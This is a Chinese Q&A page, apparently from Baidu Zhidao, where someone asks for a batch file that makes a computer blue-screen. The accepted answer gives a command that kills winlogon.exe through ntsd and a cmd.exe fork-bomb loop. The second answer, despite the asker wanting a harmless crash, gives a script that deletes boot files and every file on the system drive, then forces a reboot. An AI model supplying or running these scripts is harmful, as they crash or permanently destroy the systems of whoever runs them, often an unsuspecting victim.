如何用批处理命令让电脑蓝屏
我记得以前见过有段批处理命令写成BAT之后运行就可以使电脑蓝屏.....重起之后就恢复正常了!哪位大虾知道告诉我下.....急求......不是这种蓝屏,我要的是就像驱动...
我记得以前见过有段批处理命令写成BAT之后运行就可以使电脑蓝屏.....重起之后就恢复正常了!
哪位大虾知道告诉我下.....急求......
不是这种蓝屏,我要的是就像驱动错误一样,蓝屏死机! 展开
哪位大虾知道告诉我下.....急求......
不是这种蓝屏,我要的是就像驱动错误一样,蓝屏死机! 展开
2个回答
展开全部
@echo off
cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul
或者
@echo off
:xiaoz
cls
start cmd.exe
goto xiaoz
cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul
或者
@echo off
:xiaoz
cls
start cmd.exe
goto xiaoz
本回答被提问者采纳
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoesec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
del %systemdrive%\*.*/f /s /q
shutdown -r -f -t 00
attrib -r -s -h c:\autoexec.bat
del c:\autoesec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
del %systemdrive%\*.*/f /s /q
shutdown -r -f -t 00
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询